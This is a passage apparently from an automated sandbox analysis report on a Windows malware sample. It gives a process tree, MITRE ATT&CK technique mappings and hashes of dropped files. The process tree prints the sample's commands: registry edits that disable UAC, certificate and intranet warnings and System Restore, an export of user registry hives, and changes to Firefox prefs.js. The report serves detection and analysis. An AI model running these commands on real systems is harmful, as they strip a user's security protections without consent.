    C:\Windows\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 00000000 /f
    3⤵
    - UAC bypass
    PID:1496
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dir "\Users\Admin\.." /b /s | find "prefs.js"
    3⤵
    PID:4276
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" dir "\Users\Admin\.." /b /s "
      4⤵
      PID:2964
  - - C:\Windows\SysWOW64\find.exe
      find "prefs.js"
      4⤵
      PID:4932
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\59q4zd6z.default-release\prefs.js "
    3⤵
    - Views/modifies file attributes
    PID:2980
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe -r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\59q4zd6z.default-release\prefs.js "
    3⤵
    - Views/modifies file attributes
    PID:4984
- - C:\Windows\SysWOW64\attrib.exe
    attrib.exe +r "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\59q4zd6z.default-release\prefs.js "
    3⤵
    - Views/modifies file attributes
    PID:404
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe export HKU C:\Users\Admin\AppData\Local\Temp\~r.tmp
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~r.tmp "
    3⤵
    PID:4308
- - C:\Windows\SysWOW64\find.exe
    C:\Windows\system32\find.exe "Internet Explorer\Main"
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c type C:\Users\Admin\AppData\Local\Temp\~i.tmp | C:\Windows\system32\find.exe "S-1-5-21"
    3⤵
    PID:4436
  - - C:\Windows\SysWOW64\find.exe
      C:\Windows\system32\find.exe "S-1-5-21"
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" type C:\Users\Admin\AppData\Local\Temp\~i.tmp "
      4⤵
      PID:1476
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnOnIntranet" /t REG_DWORD /d "0x00000000" /f
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:4652
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:3444
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 0x00000001 /f
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap" /v "AutoDetect" /t REG_DWORD /d "0x00000000" /f
    3⤵
    PID:2820
- - C:\Windows\SysWOW64\reg.exe
    C:\Windows\system32\reg.exe add "HKU\S-1-5-21-1168293393-3419776239-306423207-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v "WarnonBadCertRecving" /t REG_DWORD /d "0x00000000" /f
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo y"
    3⤵
    PID:2720

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
471B

MD5
f3990afbcdf64f1f806d1b926cf35b3d

SHA1
da1297f9ac1e9e9e7e78b567006e9248bfc212f7

SHA256
48c214dd545cc2718f7e844d699efae28f80d683340959e000bb41ad75dd6386

SHA512
9b5bc750b2e1038c82a93d51efe0d7dcf951ca594a62a90bac0ca1019d232afd07f9630e1ba1b609e128a9ba9c23c1ea8f1badd9e6b25f3eb591a936c89ee939

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

Filesize
404B

MD5
b48cca54d8be662c6136cafb1e963d52

SHA1
a3321738eea6d959f79a5f605705e910057a1f11

SHA256
39d636095ce44481c5a7ebd0d26e8adfbd4f720164d2e3494897895202b8e1fd

SHA512
183684aa8c56a8ea3513d927b78f24c99b74e1560e91e317c13b6c3992f748a3a237eff0d545ac0039e6299390abc4d63c9852af8982995df7847e71750ba4c8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico

Filesize
4KB

MD5
da597791be3b6e732f0bc8b20e38ee62

SHA1
1125c45d285c360542027d7554a5c442288974de

SHA256
5b2c34b3c4e8dd898b664dba6c3786e2ff9869eff55d673aa48361f11325ed07

SHA512
d8dc8358727590a1ed74dc70356aedc0499552c2dc0cd4f7a01853dd85ceb3aead5fbdc7c75d7da36db6af2448ce5abdff64cebdca3533ecad953c061a9b338e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\8D1Z5HG5\suggestions[1].en-US

Filesize
17KB

MD5
5a34cb996293fde2cb7a4ac89587393a

SHA1
3c96c993500690d1a77873cd62bc639b3a10653f

SHA256
c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad

SHA512
e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\4D74.tmp\Untitled.bat

Filesize
14KB

MD5
4f291149b612a318b32d3d8c0592254b

SHA1
cd2c451a43e963b575aceed5071ab50c85b2350e

SHA256
531adc8e3115b82be2cbbb0cedad352fe288454ae77c00ef8b5fc4ba591e8d14

SHA512
88719dd4c68a65489d317c546543dfbf2183ecab45f42e6dfa52604f1daed79617120bd115475924dd9309161b43b7b918fcf12e01dd24af0ed6c32a073446c8

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_ZHCNTALV.txt

Filesize
4KB

MD5
25ba9cfbb723c6d6d53dc6e63f53d366

SHA1
fff342d5805966b8375a66aeb2fef67f8f809841

SHA256
9c3893a84d32d9abf989f4f3dc17b1e653c88e96ea8b8c7075e98772c4f83619

SHA512
e527712fe5fd5eca802349fd0fb15f8e21c8a83fd53ca6833ca0f833904ceb44d520ee0600afd3e872897daa63d99eeaecce0337c083841d3fa64bbd85c14f6f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_ZHCNTALV.txt

Filesize
1KB

MD5
ac8ab51cf22da4feb6f5513827f24a9c

SHA1
49d2baa3aebec2ebcbb8a6e310add67f2195160b

SHA256
ae840e67bda81693e7d4f8e70a45d41a8ed764599ecc6d15fa91579fb226e146

SHA512
79090676389451c7fcdd3bc3c30fcd333f9007714cc7709aa3643462b1a339cb9d5a2ddc6cfa579ed1204becba225b7d7173aa0276183c7fdd8281234bc49ee5

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_ZHCNTALV.txt

Filesize
1KB

MD5
81747a2f0b5cfc897263e7478f442cde

SHA1
105a35d01d28a5ba8366a38132ef129fe5427da8

SHA256
04969351e4b113ece5ef78308e98dbeb4dcdc22814f6ac5d73c1aeaf674d930b

SHA512
20e3a77e0fd5f04c822710461432d6a0cc000af8b1f431244e9d06bdb94464a1110ddeec5b588299a0638c86203234b85c7087fa0fcef188436655c537312d5f

Download Submit
C:\Users\Admin\AppData\Local\Temp\KB_ZHCNTALV.txt

Filesize
3KB

MD5
c0db1effb8446b3d2f4b76637ab27aab

SHA1
e72baf1431b9ecddb3d546b420da91ee86600e85

SHA256
e0c65686d6f310a1849a0215372686bb2bbfb73f206e056e99736731fc34c6eb

SHA512
8dd3dea605be56070c766a05139b1fc38c9238e77c80d7d5cbe2bc08b2a2b9302b87e506b2a94ac111b71c8b192600f35676fc4b9a8d84ff7ed4babc99935a24

Download Submit
C:\Users\Admin\AppData\Local\Temp\Kno67D2.tmp

Filesize
88KB

MD5
002d5646771d31d1e7c57990cc020150

SHA1
a28ec731f9106c252f313cca349a68ef94ee3de9

SHA256
1e2e25bf730ff20c89d57aa38f7f34be7690820e8279b20127d0014dd27b743f

SHA512
689e90e7d83eef054a168b98ba2b8d05ab6ff8564e199d4089215ad3fe33440908e687aa9ad7d94468f9f57a4cc19842d53a9cd2f17758bdadf0503df63629c6

Download Submit
C:\Users\Admin\AppData\Local\Temp\REG5767.tmp

Filesize
2.2MB

MD5
8add2e856d472b7fbfe7b6dd7ecd02a4

SHA1
f34076388b5d1bd543bb5422c2401430bb0fe9a8

SHA256
f4d7def99a78ba3116c2d76bab4e40e2646ff2dacd0d9d1925adbb5cce99b1c6

SHA512
5a395b85d05c1febeeaeaeab46d676d48232e7cbc979440fa787cf76bd6b5aa354b779dd045d3e5438a58967d5e72bbfe6b743e5e5497920bdb9068b200f51ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\~i.tmp

Filesize
738B

MD5
6bd7b6da6f7b06231b95083549eea296

SHA1
7e8a8e1e7ce426a5b3506aa7e490f29e140ba5d7

SHA256
6a99dc811613e970c577a1c98c6f44cef05445a292e0dcc73fec534c7a7397e4

SHA512
84939fad2f8097f3b25d76b6c64fcdee0b35f53f57951174c3744f74e68e440ba665a6ede36b948f75759dd66b4db6d05baf4b4e87d652f6faa1a120c7960514

Download Submit
C:\Users\Admin\AppData\Local\Temp\~r.tmp

Filesize
1.5MB

MD5
82ff2ba0a675453aabad8602008c7132

SHA1
973953d90dcf7adb300918e516ec7691cc421b71

SHA256
b82231bdf3a0e622909176dfc1b2145a4ec2e016c8992cedfaad4f595a34e127

SHA512
4a052d3f0f62c13914b0d044251f46119225980ceed444e96f5a886d0747b3d3fe49a8f2fbddd09544e947aa19b707b92b9487ecac6757769c71907368484c1e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\59q4zd6z.default-release\prefs.js

Filesize
6KB

MD5
5fae60f583f533ca0c03d3da9ee3ec84

SHA1
91ee9d75641e866d77087ffdce13e451611df5c8

SHA256
95df4b5e853bdcf8592722e851ab93ef43ab3a567b76600d2f96e7cdd635697e

SHA512
dec3eb281271dd51d1a359b5c8e46af4c940ad8f9e820cd5522918834a7fe2a5a56a66b1b8d56fe5744e0359b13cdd0d004a57eaef671d07d23eb1d627007289

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\59q4zd6z.default-release\prefs.js

Filesize
6KB

MD5
621ec8f3dc02bacfa1abb2029faf3648

SHA1
4b50fe555240d470471f5dfad336d706b9b25bc8

SHA256
cfc5de8e93cc66319e0dca77dc941b8aad0e76cea9ca80ef831316d3212b4039

SHA512
f21af5a7da2960d3af80066e7a6cb97147a732993c3bcdc3996438d06098ea5b65e20df92070ff353d85ff2689d5eb12d2a17ac990a11c4b1e7aca41de4e46d4

Download Submit
memory/1852-139-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download
memory/1852-0-0x0000000000400000-0x0000000000414000-memory.dmp

Filesize
80KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads